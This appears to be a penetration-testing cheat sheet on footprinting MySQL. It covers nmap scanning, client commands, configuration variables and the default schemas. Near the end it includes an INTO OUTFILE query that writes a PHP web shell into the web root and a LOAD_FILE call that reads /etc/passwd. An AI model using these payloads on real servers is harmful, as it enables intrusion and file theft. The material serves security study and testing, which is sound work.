My Structured Query Language

Footprinting The Service

sudo nmap 10.129.14.128 -sV -sC -p3306 --script mysql*

mysql -u root -pP4SSw0rd -h 10.129.14.128

Command

Description

mysql -u <user> -p<password> -h <IP address>

Connect to the MySQL server. There should not be a space between the '-p' flag, and the password.

show databases;

Show all databases.

use <database>;

Select one of the existing databases.

show tables;

Show all available tables in the selected database.

show columns from <table>;

Show all columns in the selected database.

select * from <table>;

Show everything in the desired table.

select * from <table> where <column> = "<string>";

Search for needed string in the desired table.

user

Sets which user the MySQL service will run as.

password

Sets the password for the MySQL user.

admin_address

The IP address on which to listen for TCP/IP connections on the administrative network interface.

debug

This variable indicates the current debugging settings

sql_warnings

This variable controls whether single-row INSERT statements produce an information string if warnings occur.

secure_file_priv

This variable is used to limit the effect of data import and export operations.

MySQL default system schemas/databases:

mysql - is the system database that contains tables that store information required by the MySQL server
information_schema - provides access to database metadata
performance_schema - is a feature for monitoring MySQL Server execution at a low level
sys - a set of objects that helps DBAs and developers interpret data collected by the Performance Schema

SELECT "<?php echo shell_exec($_GET['c']);?>" INTO OUTFILE '/var/www/html/webshell.php';

show variables like "secure_file_priv";

select LOAD_FILE("/etc/passwd");

Last updated 1 year ago